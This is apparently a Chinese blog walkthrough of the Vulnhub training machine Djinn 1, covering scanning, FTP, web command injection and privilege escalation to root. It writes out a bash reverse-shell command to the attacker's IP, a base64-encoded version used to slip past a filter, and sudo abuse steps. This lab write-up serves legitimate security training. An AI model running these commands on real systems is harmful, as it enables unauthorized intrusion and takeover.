Vulnhub-靶机-Djinn 1

Vulnhub—靶机—Djinn 1

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

地址:https://www.vulnhub.com/entry/djinn-1,397/

一、信息收集

【步骤一】使用nmap确定目标靶机地址并进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.132
在这里插入图片描述

【步骤二】发现开放了21端口ftp服务,进行匿名登录查看:
在这里插入图片描述

【步骤三】将文件下载并查看
【分析】根据文件内容解读在1337端口为设置了一个游戏,能不能拿到最后一个关卡,获得奖励。并且发现了一个疑似用户@nitish81299,去1337端口查看游戏
在这里插入图片描述
在这里插入图片描述

【步骤四】使用python脚本运算
【分析】获得一串数字,1356, 6784, 3409
在这里插入图片描述
【步骤五】使用dirbuster对7331web进行目录枚举,并查看目录内容
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

二、漏洞利用

【步骤六】在第二个页面发现了隐藏的内容 翻译后没有什么用,在第一个页面告诉我们可以让我们实现所有愿望,那我们尝试让他反弹一个shell
【命令】bash -i >& /dev/tcp/192.168.110.128/1234 0>&1
在这里插入图片描述

【步骤七】发现没有反弹shell,使用bp查看发现被过滤了,使用base64编码
【命令】echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMjgvMTIzNCAwPiYx | base64 -d |bash
在这里插入图片描述

【步骤八】进行内网信息收集,查看配置文件passwd及home目录内容
【分析】发现几个用户,在home下发现了疑似nitish的密码,尝试切换用户
在这里插入图片描述
在这里插入图片描述

【步骤九】使用python安装pty,构建交互式shell
【命令】python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述

【步骤十】搜索s文件
【命令】find / -perm -u=s -type f -exec ls -l {} ; 2>/dev/null
【分析】发现在nitish用户下有一个sam用户的可执行文件
在这里插入图片描述
【步骤十一】执行该文件
【命令】sudo -u sam genie -cmd whoami
在这里插入图片描述

【步骤十二】提权到sam,查看当前用户可执行的sudo命令
【命令】Sudo -l
在这里插入图片描述
【步骤十三】查看该程序内容
【分析】发现当选择第二项时,值为num时会执行一个bin/sh
在这里插入图片描述

【步骤十四】使用root执行该程序
在这里插入图片描述

【步骤十五】查看flag
在这里插入图片描述

三、Flag

【flag】33eur2wjdmq80z47nyy4fx54bnlg3ibc

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值